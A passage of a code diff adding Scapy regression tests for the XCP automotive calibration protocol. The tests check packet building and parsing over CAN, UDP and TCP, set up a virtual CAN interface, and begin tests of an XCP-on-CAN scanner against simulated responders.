+assert "daq" in unlock_response.current_resource_protection_status +assert "stim" not in unlock_response.current_resource_protection_status +assert "pgm" in unlock_response.current_resource_protection_status +assert "x5" not in unlock_response.current_resource_protection_status +assert "x6" not in unlock_response.current_resource_protection_status +assert "x7" not in unlock_response.current_resource_protection_status + += test_get_id + +conf.contribs['XCP']['byte_order'] = 0 +cto_request = CTORequest() / GetId(b'\x01') +assert cto_request.pid == 0xfa +assert bytes(cto_request) == b'\xfa\x01' +assert cto_request['GetId'].identification_type == 0x01 + +cto_response = CTOResponse(b'\xff\x00\x00\x00\x06\x00\x00\x00') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +get_id_response = cto_response["IdPositiveResponse"] +assert get_id_response.mode == 0x00 +assert get_id_response.length == 6 + + += test_upload + +conf.contribs['XCP']['MAX_CTO'] = 8 +conf.contribs['XCP']['Address_Granularity_Byte'] = 1 + +cto_request = CTORequest() / Upload(b'\x06') +assert cto_request.pid == 0xf5 +assert bytes(cto_request) == b'\xf5\x06' +assert cto_request['Upload'].nr_of_data_elements == 0x06 + +cto_response = CTOResponse(b'\xff\x58\x43\x50\x53\x49\x4D') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +upload_response = cto_response["UploadPositiveResponse"] +assert upload_response.element == b'\x58\x43\x50\x53\x49\x4D' + += test_cal_page + +cto_request = CTORequest() / GetCalPage(b'\x01\x00') +assert cto_request.pid == 0xea +assert bytes(cto_request) == b'\xea\x01\x00' + +cto_response = CTOResponse(b'\xff\x00\x00\x01') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +get_cal_page_response = cto_response["CalPagePositiveResponse"] +assert get_cal_page_response.logical_data_page_number == 0x01 + += test_set_mta + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / SetMta(b'\xff\xff\x00\x3c\x00\x00\x00') +assert cto_request.pid == 0xf6 +assert bytes(cto_request) == b'\xf6\xff\xff\x00\x3c\x00\x00\x00' +assert cto_request['SetMta'].address_extension == 0x00 +assert cto_request['SetMta'].address == 0x3C + +cto_response = CTOResponse(b'\xff') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_build_checksum + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / BuildChecksum(b'\xff\xff\xff\xad\x0d\x00\x00') +assert cto_request.pid == 0xf3 +assert bytes(cto_request) == b'\xf3\xff\xff\xff\xad\x0d\x00\x00' +assert hex(cto_request['BuildChecksum'].block_size) == '0xdad' + +cto_response = CTOResponse(b'\xff\x02\xff\xff\x2C\x87\x00\x00') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +build_checksum_response = cto_response["ChecksumPositiveResponse"] +assert build_checksum_response.checksum_type == 0x02 +assert hex(build_checksum_response.checksum) == '0x872c' + += test_download + +conf.contribs['XCP']['byte_order'] = 0 +conf.contribs['XCP']['MAX_CTO'] = 8 +conf.contribs['XCP']['Address_Granularity_Byte'] = 1 + +cto_request = CTORequest() / Download(b'\x04\x00\x00\x80\x3f') +assert cto_request.pid == 0xf0 +assert bytes(cto_request) == b'\xf0\x04\x00\x00\x80\x3f' +assert cto_request['Download'].nr_of_data_elements == 0x04 +assert cto_request['Download'].data_elements == b'\x00\x00\x80\x3f' + +cto_response = CTOResponse(b'\xff') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_short_upload + +conf.contribs['XCP']['byte_order'] = 0 +conf.contribs['XCP']['MAX_CTO'] = 8 +conf.contribs['XCP']['Address_Granularity_Byte'] = 1 + +cto_request = CTORequest() / ShortUpload(b'\04\xff\x00\x60\x00\x00\x00') +assert cto_request.pid == 0xf4 +assert bytes(cto_request) == b'\xf4\x04\xff\x00\x60\x00\x00\x00' +assert cto_request['ShortUpload'].nr_of_data_elements == 0x04 +assert cto_request['ShortUpload'].address_extension == 0x00 +assert hex(cto_request['ShortUpload'].address) == '0x60' + +cto_response = CTOResponse(b'\xff\x00\x00\x80\x3F') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +upload_response = cto_response["ShortUploadPositiveResponse"] +assert upload_response.element == b'\x00\x00\x80\x3F' + += test_copy_cal_page + +cto_request = CTORequest() / CopyCalPage(b'\00\x01\x02\x03') +assert cto_request.pid == 0xe4 +assert bytes(cto_request) == b'\xe4\00\x01\x02\x03' +assert cto_request['CopyCalPage'].segment_num_src == 0x00 +assert cto_request['CopyCalPage'].page_num_src == 0x01 +assert cto_request['CopyCalPage'].segment_num_dst == 0x02 +assert cto_request['CopyCalPage'].page_num_dst == 0x03 + +cto_response = CTOResponse(b'\xff') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_get_daq_processor_info + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / GetDaqProcessorInfo() +assert cto_request.pid == 0xda +assert bytes(cto_request) == b'\xda' +cto_response = CTOResponse(b'\xff\x11\x00\x00\x01\x00\x00\x40') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +processor_info_response = cto_response["DAQProcessorInfoPositiveResponse"] +assert processor_info_response.daq_properties == 0x11 +assert "daq_config_type" in processor_info_response.daq_properties +assert "timestamp_supported" in processor_info_response.daq_properties + +assert "prescaler_supported" not in processor_info_response.daq_properties +assert "resume_supported" not in processor_info_response.daq_properties +assert "bit_stim_supported" not in processor_info_response.daq_properties +assert "pid_off_supported" not in processor_info_response.daq_properties +assert "overload_msb" not in processor_info_response.daq_properties +assert "overload_event" not in processor_info_response.daq_properties + +assert processor_info_response.max_daq == 0x0000 +assert processor_info_response.max_event_channel == 0x0001 +assert processor_info_response.min_daq == 0x00 +assert processor_info_response.daq_key_byte == 0x40 +assert "optimisation_type_0" not in processor_info_response.daq_key_byte +assert "optimisation_type_1" not in processor_info_response.daq_key_byte +assert "optimisation_type_2" not in processor_info_response.daq_key_byte +assert "optimisation_type_3" not in processor_info_response.daq_key_byte +assert "identification_field_type_0" in processor_info_response.daq_key_byte +assert "identification_field_type_1" not in processor_info_response.daq_key_byte + +assert "address_extension_odt" not in processor_info_response.daq_key_byte +assert "address_extension_daq" not in processor_info_response.daq_key_byte +assert "address_extension_daq" not in processor_info_response.daq_key_byte + += test_daq_resolution_info + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / GetDaqResolutionInfo() +assert cto_request.pid == 0xd9 +assert bytes(cto_request) == b'\xd9' + +cto_response = CTOResponse(b'\xff\x02\xfd\xff\xff\x62\x0a\x00') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +resolution_info_response = cto_response["DAQResolutionInfoPositiveResponse"] +assert resolution_info_response.granularity_odt_entry_size_daq == 0x02 +assert resolution_info_response.max_odt_entry_size_daq == 0xfd +assert resolution_info_response.granularity_odt_entry_size_stim == 0xff +assert resolution_info_response.max_odt_entry_size_stim == 0xff +assert resolution_info_response.timestamp_mode == 0x62 +assert "size_0" not in resolution_info_response.timestamp_mode +assert "size_1" in resolution_info_response.timestamp_mode +assert "size_2" not in resolution_info_response.timestamp_mode +assert "timestamp_fixed" not in resolution_info_response.timestamp_mode +assert "unit_0" not in resolution_info_response.timestamp_mode +assert "unit_1" in resolution_info_response.timestamp_mode +assert "unit_2" in resolution_info_response.timestamp_mode +assert "unit_3" not in resolution_info_response.timestamp_mode + +assert resolution_info_response.timestamp_ticks == 0x000A + += test_daq_event_info + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / GetDaqEventInfo(b'\xff\x00\x00') +assert cto_request.pid == 0xd7 +assert bytes(cto_request) == b'\xd7\xff\x00\x00' +assert cto_request['GetDaqEventInfo'].event_channel_num == 0x0000 + +cto_response = CTOResponse(b'\xFF\x04\x01\x05\x0A\x60\x00') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +event_info_response = cto_response["DAQEventInfoPositiveResponse"] +assert event_info_response.daq_event_properties == 0x04 +assert "x_0" not in event_info_response.daq_event_properties +assert "x_1" not in event_info_response.daq_event_properties +assert "daq" in event_info_response.daq_event_properties +assert "stim" not in event_info_response.daq_event_properties +assert "x_4" not in event_info_response.daq_event_properties +assert "x_5" not in event_info_response.daq_event_properties +assert "x_6" not in event_info_response.daq_event_properties +assert "x_7" not in event_info_response.daq_event_properties + +assert event_info_response.max_daq_list == 0x01 +assert event_info_response.event_channel_name_length == 0x05 +assert event_info_response.event_channel_time_cycle == 0x0a +assert event_info_response.event_channel_time_unit == 0x60 +assert event_info_response.event_channel_priority == 0x00 + += test_daq_list_info + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / GetDaqListInfo(b'\xff\x00\x00') +assert cto_request.pid == 0xd8 +assert bytes(cto_request) == b'\xd8\xff\x00\x00' +assert cto_request['GetDaqListInfo'].daq_list_num == 0x0000 + +cto_response = CTOResponse(b'\xFF\x04\x03\x0a\x00\x00') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +list_info_response = cto_response["DAQListInfoPositiveResponse"] +assert list_info_response.daq_list_properties == 0x04 +assert "predefined" not in list_info_response.daq_list_properties +assert "event_fixed" not in list_info_response.daq_list_properties +assert "daq" in list_info_response.daq_list_properties +assert "stim" not in list_info_response.daq_list_properties +assert "x_4" not in list_info_response.daq_list_properties +assert "x_5" not in list_info_response.daq_list_properties +assert "x_6" not in list_info_response.daq_list_properties +assert "x_7" not in list_info_response.daq_list_properties + +assert list_info_response.max_odt == 0x03 +assert list_info_response.max_odt_entries == 0x0a +assert list_info_response.fixed_event == 0x00 + += test_clear_daq_list + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / ClearDaqList(b'\xff\x00\x00') +assert cto_request.pid == 0xe3 +assert bytes(cto_request) == b'\xe3\xff\x00\x00' +assert cto_request['ClearDaqList'].daq_list_num == 0x0000 + +cto_response = CTOResponse(b'\xFF') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_alloc_daq + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / AllocDaq(b'\xff\x01\x00') +assert cto_request.pid == 0xd5 +assert bytes(cto_request) == b'\xd5\xff\x01\x00' +assert cto_request['AllocDaq'].daq_count == 0x0001 + +cto_response = CTOResponse(b'\xFF') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_alloc_odt + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / AllocOdt(b'\xff\x00\x00\x01') +assert cto_request.pid == 0xd4 +assert bytes(cto_request) == b'\xd4\xff\x00\x00\x01' +assert cto_request['AllocOdt'].daq_list_num == 0x0000 +assert cto_request['AllocOdt'].odt_count == 0x01 + +cto_response = CTOResponse(b'\xFF') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_alloc_odt_entry + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / AllocOdtEntry(b'\xff\x00\x00\x00\x02') +assert cto_request.pid == 0xd3 +assert bytes(cto_request) == b'\xd3\xff\x00\x00\x00\x02' +assert cto_request['AllocOdtEntry'].daq_list_num == 0x0000 +assert cto_request['AllocOdtEntry'].odt_num == 0x00 +assert cto_request['AllocOdtEntry'].odt_entries_count == 0x02 + +cto_response = CTOResponse(b'\xFF') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_set_daq_ptr + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / SetDaqPtr(b'\xff\x00\x00\x00\x00') +assert cto_request.pid == 0xe2 +assert bytes(cto_request) == b'\xe2\xff\x00\x00\x00\x00' +assert cto_request['SetDaqPtr'].daq_list_num == 0x0000 +assert cto_request['SetDaqPtr'].odt_num == 0x00 +assert cto_request['SetDaqPtr'].odt_entry_num == 0x00 + +cto_response = CTOResponse(b'\xFF') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_write_daq + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / WriteDaq(b'\xFF\x04\x00\x08\x55\x0C\x00') +assert cto_request.pid == 0xe1 +assert bytes(cto_request) == b'\xe1\xFF\x04\x00\x08\x55\x0C\x00' +assert cto_request['WriteDaq'].bit_offset == 0xff +assert cto_request['WriteDaq'].size_of_daq_element == 0x04 +assert cto_request['WriteDaq'].address_extension == 0x00 +assert cto_request['WriteDaq'].address == 0x000C5508 + +cto_response = CTOResponse(b'\xFF') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_set_daq_list_mode(self): +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / SetDaqListMode(b'\x10\x00\x00\x00\x00\x01\x00') +assert cto_request.pid == 0xe0 +assert bytes(cto_request) == b'\xe0\x10\x00\x00\x00\x00\x01\x00' +set_daq_list_mode_request = cto_request['SetDaqListMode'] +assert set_daq_list_mode_request.mode == 0x10 +assert "x0" not in set_daq_list_mode_request.mode +assert "direction" not in set_daq_list_mode_request.mode +assert "x2" not in set_daq_list_mode_request.mode +assert "x3" not in set_daq_list_mode_request.mode +assert "timestamp" in set_daq_list_mode_request.mode +assert "pid_off" not in set_daq_list_mode_request.mode +assert "x6" not in set_daq_list_mode_request.mode +assert "x7" not in set_daq_list_mode_request.mode + +assert set_daq_list_mode_request.daq_list_num == 0x0000 +assert set_daq_list_mode_request.event_channel_num == 0x0000 +assert set_daq_list_mode_request.transmission_rate_prescaler == 0x01 +assert set_daq_list_mode_request.daq_list_prio == 0x00 + +cto_response = CTOResponse(b'\xFF') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_start_stop_daq_list + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / StartStopDaqList(b'\x02\x00\x00') +assert cto_request.pid == 0xde +assert bytes(cto_request) == b'\xde\x02\x00\x00' +assert cto_request['StartStopDaqList'].mode == 0x02 +assert cto_request['StartStopDaqList'].daq_list_number == 0x0000 + +cto_response = CTOResponse(b'\xFF\xbb') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +assert cto_response['StartStopDAQListPositiveResponse'].first_pid == 0xbb + += test_get_daq_clock + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / GetDaqClock() +assert cto_request.pid == 0xdc +assert bytes(cto_request) == b'\xdc' + +cto_response = CTOResponse(b'\xFF\xFF\xFF\xFF\xAA\xC5\x00\x00') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +get_daq_clock_response = cto_response["DAQClockListPositiveResponse"] + +assert get_daq_clock_response.receive_timestamp == 0x0000C5AA + += Test negative response + +cto_request = CTORequest() / GetCommModeInfo() +cto_response = CTOResponse() / NegativeResponse() +assert cto_response.packet_code == 0xFE +assert cto_response.answers(cto_request) + += test_start_stop_synch + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / StartStopSynch(b'\x01') +assert cto_request.pid == 0xdd +assert bytes(cto_request) == b'\xdd\x01' +assert cto_request['StartStopSynch'].mode == 0x01 + +cto_response = CTOResponse(b'\xFF') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_program_start + +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / ProgramStart() +assert cto_request.pid == 0xd2 +assert bytes(cto_request) == b'\xd2' + +cto_response = CTOResponse(b'\xFF\xff\x01\x08\x2A\xFF\xdd') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +program_start_response = cto_response['ProgramStartPositiveResponse'] + +assert program_start_response.comm_mode_pgm == 0x01 +assert "master_block_mode" in program_start_response.comm_mode_pgm +assert "interleaved_mode" not in program_start_response.comm_mode_pgm +assert "x2" not in program_start_response.comm_mode_pgm +assert "x3" not in program_start_response.comm_mode_pgm +assert "x4" not in program_start_response.comm_mode_pgm +assert "x5" not in program_start_response.comm_mode_pgm +assert "slave_block_mode" not in program_start_response.comm_mode_pgm +assert "x7" not in program_start_response.comm_mode_pgm + +assert program_start_response.max_cto_pgm == 0x08 +assert program_start_response.max_bs_pgm == 0x2a +assert program_start_response.min_bs_pgm == 0xff +assert program_start_response.queue_size_pgm == 0xdd + += test_program_clear(self): +conf.contribs['XCP']['byte_order'] = 0 + +cto_request = CTORequest() / ProgramClear(b'\x00\xff\xff\x00\x01\x00\x00') +assert cto_request.pid == 0xd1 +assert bytes(cto_request) == b'\xd1\x00\xff\xff\x00\x01\x00\x00' + +assert cto_request['ProgramClear'].mode == 0x00 +assert cto_request['ProgramClear'].clear_range == 0x00000100 + +cto_response = CTOResponse(b'\xff') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + += test_program + +conf.contribs['XCP']['byte_order'] = 0 +conf.contribs['XCP']['MAX_CTO'] = 8 +conf.contribs['XCP']['Address_Granularity_Byte'] = 1 + +cto_request = CTORequest() / Program(b'\x06\x00\x01\x02\x03\x04\x05') +assert cto_request.pid == 0xd0 +assert bytes(cto_request) == b'\xd0\x06\x00\x01\x02\x03\x04\x05' + +assert cto_request['Program'].nr_of_data_elements == 0x06 +assert cto_request['Program'].data_elements == b"\x00\x01\x02\x03\x04\x05" + +cto_response = CTOResponse(b'\xff') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + + ++ Tests on a virtual CAN-Bus += Imports + +import threading +import time +from subprocess import call + +import scapy.modules.six as six +from scapy.contrib.automotive.xcp.cto_commands_master import Connect +from scapy.contrib.automotive.xcp.xcp import CTORequest, XCPOnCAN, CTOResponse, ConnectPositiveResponse +from scapy.main import load_layer + += Load module + +load_layer("can", globals_dict=globals()) +load_contrib("automotive.xcp.xcp", globals_dict=globals()) + += Global variables + +iface_name = "vcan_xcp" + += Initialize a virtual CAN interface +~ vcan_socket needs_root linux + +print('setting up CAN') + +if 0 != call(["cansend", iface_name, "000#"]): + # vcan0 is not enabled + if 0 != call(["sudo", "modprobe", "vcan"]): + raise Exception("modprobe vcan failed") + if 0 != call(["sudo", "ip", "link", "add", "name", iface_name, "type", "vcan"]): + print("add %s failed: Maybe it was already up?" % iface_name) + if 0 != call(["sudo", "ip", "link", "set", "dev", iface_name, "up"]): + raise Exception("could not bring up %s" % iface_name) + +if 0 != call(["cansend", iface_name, "000#"]): + raise Exception("cansend doesn't work") + +print("CAN should work now") + + += Define new_can_socket0 for root and linux +~ vcan_socket needs_root linux +if six.PY3 and not conf.use_pypy: + from scapy.contrib.cansocket_native import CANSocket + new_can_socket0 = lambda: CANSocket(iface_name) + print("Using Native CANSocket on " + iface_name) +else: + from scapy.contrib.cansocket_python_can import CANSocket + new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface_name, bitrate=250000, timeout=0.01) + print("Using Soft CANSocket on " + iface_name) + += Define new_can_socket0 without root or linux +if "new_can_socket0" not in globals(): + from scapy.contrib.cansocket_python_can import CANSocket + new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface_name, timeout=0.01) + print("Using Soft CANSocket on virtual in-process can bus") + + += verify CAN Socket creation works +s = new_can_socket0() +s.close() + + += Connect +sock1 = new_can_socket0() +sock2 = new_can_socket0() + +sock1.basecls = XCPOnCAN +sock2.basecls = XCPOnCAN + +def ecu(): + pkts = sock2.sniff(count=1, timeout=5) + if len(pkts) == 1: + response = XCPOnCAN(identifier=0x700) / CTOResponse() / ConnectPositiveResponse(b'\x15\xC0\x08\x08\x00\x10\x10') + sock2.send(response) + +thread = threading.Thread(target=ecu) +thread.start() +time.sleep(0.1) +pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() +ans = sock1.sr1(pkt, timeout=3) +thread.join() +sock1.close() +sock2.close() + +assert ans.identifier == 0x700 +cto_response = ans["CTOResponse"] +assert cto_response.packet_code == 0xff + +connect_response = cto_response["ConnectPositiveResponse"] + +assert connect_response.resource == 0x15 +assert connect_response.comm_mode_basic == 0xC0 +assert connect_response.max_cto == 8 +assert connect_response.max_dto is None +assert connect_response.max_dto_le == 8 + +assert connect_response.xcp_protocol_layer_version_number_msb == 0x10 +assert connect_response.xcp_transport_layer_version_number_msb == 0x10 + + +cto_request = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() + +assert cto_request.identifier == 0x700 +assert cto_request.pid == 0xFF +assert cto_request.connection_mode == 0 +assert bytes(cto_request) == b'\x00\x00\x07\x00\x02\x00\x00\x00\xff\x00' + +xcp_on_can = XCPOnCAN(b'\x00\x00\x05\x00\x08\x00\x00\x00\xff\x15\xC0\x08\x08\x00\x10\x10') +assert xcp_on_can.identifier == 0x500 +assert xcp_on_can.answers(cto_request) + +cto_response = xcp_on_can["CTOResponse"] +assert cto_response.packet_code == 0xFF + +connect_response = cto_response["ConnectPositiveResponse"] +assert connect_response.resource == 0x15 +assert connect_response.comm_mode_basic == 0xC0 +assert connect_response.max_cto == 8 +assert connect_response.max_cto == 8 + +assert connect_response.xcp_protocol_layer_version_number_msb == 0x10 +assert connect_response.xcp_transport_layer_version_number_msb == 0x10 + +assert conf.contribs['XCP']['byte_order'] == 0 +assert conf.contribs['XCP']['MAX_CTO'] == 8 +assert conf.contribs['XCP']['MAX_DTO'] == 8 +assert conf.contribs['XCP']['Address_Granularity_Byte'] == 1 + += Endianness test for ConnectPositiveResponse + +p = ConnectPositiveResponse(b"\x00\xFF\x01\x00\xFF\x05\x05") +assert p.max_dto_le is None +assert p.max_dto == 0xff + +p = ConnectPositiveResponse(b"\x00\x00\x01\xFF\x00\x05\x05") +assert p.max_dto_le == 0xff +assert p.max_dto is None + += Wrong answer + +request = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() + +# This response has not enough bytes for a ConnectPositiveResponse +response = XCPOnCAN(identifier=0x90) / CTOResponse() / Raw(b'\x01\x02\x03\x04') + +assert not response.answers(request) + + ++ Cleanup VCAN += Delete vcan interfaces +~ vcan_socket needs_root linux + +if 0 != call(["sudo", "ip", "link", "delete", iface_name]): + raise Exception("%s could not be deleted" % iface_name) + ++ Tests for XCPonUDP += Imports + +from scapy.config import conf + +from scapy.contrib.automotive.xcp.cto_commands_master import Connect +from scapy.contrib.automotive.xcp.xcp import CTORequest, XCPOnUDP +from scapy.main import load_layer + += Load module + +load_layer("can", globals_dict=globals()) +load_contrib("automotive.xcp.xcp", globals_dict=globals()) + += CONNECT + +cto_request = XCPOnUDP(ctr=0, sport=1, dport=1) / CTORequest() / Connect() + +assert cto_request.length is None +assert cto_request.ctr == 0 + +assert cto_request.pid == 0xFF +assert cto_request.connection_mode == 0 +assert bytes(cto_request).endswith(b'\x00\x02\x00\x00\xff\x00') +print(XCPOnUDP(ctr=0, sport=1, dport=1)) +xcp_on_udp = XCPOnUDP(b'\x00\x01\x00\x01\x00\x0c\x00\x00\x00\x08\x00\x01\xff\x15\xC0\x08\x08\x00\x10\x10') +assert xcp_on_udp.length == 8 +assert xcp_on_udp.ctr == 1 + +assert xcp_on_udp.answers(cto_request) +cto_response = xcp_on_udp["CTOResponse"] +assert cto_response.packet_code == 0xFF + +connect_response = cto_response["ConnectPositiveResponse"] +assert connect_response.resource == 0x15 +assert connect_response.comm_mode_basic == 0xC0 +assert connect_response.max_cto == 8 +assert connect_response.max_cto == 8 + +assert connect_response.xcp_protocol_layer_version_number_msb == 0x10 +assert connect_response.xcp_transport_layer_version_number_msb == 0x10 + +assert conf.contribs['XCP']['byte_order'] == 0 +assert conf.contribs['XCP']['MAX_CTO'] == 8 +assert conf.contribs['XCP']['MAX_DTO'] == 8 +assert conf.contribs['XCP']['Address_Granularity_Byte'] == 1 + += CONNECT 2 + +prt1, prt2 = 12345, 54321 +xcp_on_udp_request = XCPOnUDP(sport=prt1, dport=prt2, ctr=0) / CTORequest() / Connect() + +assert xcp_on_udp_request.length is None +assert xcp_on_udp_request.ctr == 0 +assert xcp_on_udp_request.pid == 0xFF +assert xcp_on_udp_request.connection_mode == 0 +assert bytes(xcp_on_udp_request).endswith(b'\x00\x02\x00\x00\xff\x00') + +xcp_on_udp_response = XCPOnUDP(b'\xd4109\x00\x0c\x00\x00\x00\x08\x00\x01\xff\x15\xC0\x08\x08\x00\x10\x10') +assert xcp_on_udp_response.length == 8 +assert xcp_on_udp_response.ctr == 1 +assert xcp_on_udp_response.answers(xcp_on_udp_request) + +cto_response = xcp_on_udp_response["CTOResponse"] +assert cto_response.packet_code == 0xFF + +connect_response = cto_response["ConnectPositiveResponse"] +assert connect_response.resource == 0x15 +assert connect_response.comm_mode_basic == 0xC0 +assert connect_response.max_cto == 8 +assert connect_response.max_cto == 8 +assert connect_response.xcp_protocol_layer_version_number_msb == 0x10 +assert connect_response.xcp_transport_layer_version_number_msb == 0x10 +assert conf.contribs['XCP']['byte_order'] == 0 +assert conf.contribs['XCP']['MAX_CTO'] == 8 +assert conf.contribs['XCP']['MAX_DTO'] == 8 +assert conf.contribs['XCP']['Address_Granularity_Byte'] == 1 + += XCPOnUDP post build length + +xcp_on_udp_request = XCPOnUDP(sport=1, dport=2, ctr=0) / CTORequest() / Connect() +assert bytes(xcp_on_udp_request)[8:10] == b'\x00\x02' + ++ Tests XCPonTCP += Imports +from scapy.contrib.automotive.xcp.xcp import XCPOnTCP + += CONNECT + +prt1, prt2 = 12345, 54321 + +xcp_on_tcp_request = XCPOnTCP(sport=prt1, dport=prt2, ctr=0) / CTORequest() / Connect() +assert xcp_on_tcp_request.length is None +assert xcp_on_tcp_request.ctr == 0 +assert xcp_on_tcp_request.pid == 0xFF +assert xcp_on_tcp_request.connection_mode == 0 +assert bytes(xcp_on_tcp_request).endswith(b'\x00\x02\x00\x00\xff\x00') + +xcp_on_tcp_response = XCPOnTCP(b'\xd4109\x00\x00\x00\x00\x00\x00\x00\x00P\x12 \x00\x00\x00\x00\x00\x00\x08\x00\x01\xff\x15\xC0\x08\x08\x00\x10\x10') +assert xcp_on_tcp_response.length == 8 +assert xcp_on_tcp_response.ctr == 1 +assert xcp_on_tcp_response.answers(xcp_on_tcp_request) + +cto_response = xcp_on_tcp_response["CTOResponse"] +assert cto_response.packet_code == 0xFF + +connect_response = cto_response["ConnectPositiveResponse"] +assert connect_response.resource == 0x15 +assert connect_response.comm_mode_basic == 0xC0 +assert connect_response.max_cto == 8 +assert connect_response.max_cto == 8 +assert connect_response.xcp_protocol_layer_version_number_msb == 0x10 +assert connect_response.xcp_transport_layer_version_number_msb == 0x10 +assert conf.contribs['XCP']['byte_order'] == 0 +assert conf.contribs['XCP']['MAX_CTO'] == 8 +assert conf.contribs['XCP']['MAX_DTO'] == 8 +assert conf.contribs['XCP']['Address_Granularity_Byte'] == 1 + + += XCPOnTCP post build length + +xcp_on_tcp_request = XCPOnTCP(sport=prt1, dport=prt2, ctr=0) / CTORequest() / Connect() +assert bytes(xcp_on_tcp_request)[20:22] == b'\x00\x02' diff --git a/test/tools/xcpscanner.uts b/test/tools/xcpscanner.uts new file mode 100644 index 00000000000..8bc703d80c4 --- /dev/null +++ b/test/tools/xcpscanner.uts @@ -0,0 +1,179 @@ +% Regression tests for the XCP_CAN +~ needs_root + +# More information at http://www.secdev.org/projects/UTscapy/ + +############ +############ + ++ Basic operations += Imports + +import threading +from subprocess import call + +import six + +from scapy.consts import LINUX +from scapy.contrib.automotive.xcp.cto_commands_master import Connect, TransportLayerCmd, TransportLayerCmdGetSlaveId +from scapy.contrib.automotive.xcp.scanner import XCPOnCANScanner +from scapy.contrib.automotive.xcp.xcp import CTORequest, XCPOnCAN, CTOResponse, ConnectPositiveResponse, TransportLayerCmdGetSlaveIdResponse, GenericResponse +from scapy.contrib.cansocket_python_can import CANSocket +from scapy.main import load_layer + += Load module + +load_layer("can", globals_dict=globals()) +load_contrib("automotive.xcp.xcp", globals_dict=globals()) + += Global variables + +iface0 = "vcan0" + += Initialize a virtual CAN interface +~ vcan_socket needs_root linux + +print('setting up CAN') + +if 0 != call(["cansend", iface0, "000#"]): + # vcan0 is not enabled + if 0 != call(["sudo", "modprobe", "vcan"]): + raise Exception("modprobe vcan failed") + if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): + print("add %s failed: Maybe it was already up?" % iface0) + if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): + raise Exception("could not bring up %s" % iface0) + +if 0 != call(["cansend", iface0, "000#"]): + raise Exception("cansend doesn't work") + +print("CAN should work now") + + += Define new_can_socket0 for root and linux +~ vcan_socket needs_root linux +if six.PY3 and not conf.use_pypy: + from scapy.contrib.cansocket_native import CANSocket + new_can_socket0 = lambda: CANSocket(iface0) + print("Using Native CANSocket on " + iface0) +else: + from scapy.contrib.cansocket_python_can import CANSocket + new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, bitrate=250000, timeout=0.01) + print("Using Soft CANSocket on " + iface0) + += Define new_can_socket0 without root or linux +if "new_can_socket0" not in globals(): + from scapy.contrib.cansocket_python_can import CANSocket + new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) + print("Using Soft CANSocket on virtual in-process can bus") + + += verify CAN Socket creation works +s = new_can_socket0() +s.close() + ++ Tests XCPonCAN Scanner + += xcp can scanner broadcast ID-Range + +id_range = range(50, 53) +slave_id_1 = 10 +response_id_1 = 11 +slave_id_2 = 20 +response_id_2 = 21 + +slave_1_response = XCPOnCAN(identifier=response_id_1) / CTOResponse(packet_code=0xFF) / TransportLayerCmdGetSlaveIdResponse(can_identifier=slave_id_1) +slave_2_response = XCPOnCAN(identifier=response_id_2) / CTOResponse(packet_code=0xFF) / TransportLayerCmdGetSlaveIdResponse(can_identifier=slave_id_2) + +random_xcp_response_1 = XCPOnCAN(identifier=30) / CTOResponse(packet_code=0xFF) / GenericResponse(b"\x00\x00") +random_xcp_response_2 = XCPOnCAN(identifier=40) / CTOResponse(packet_code=0xFF) / GenericResponse(b"\x00\x00") + +sock1 = 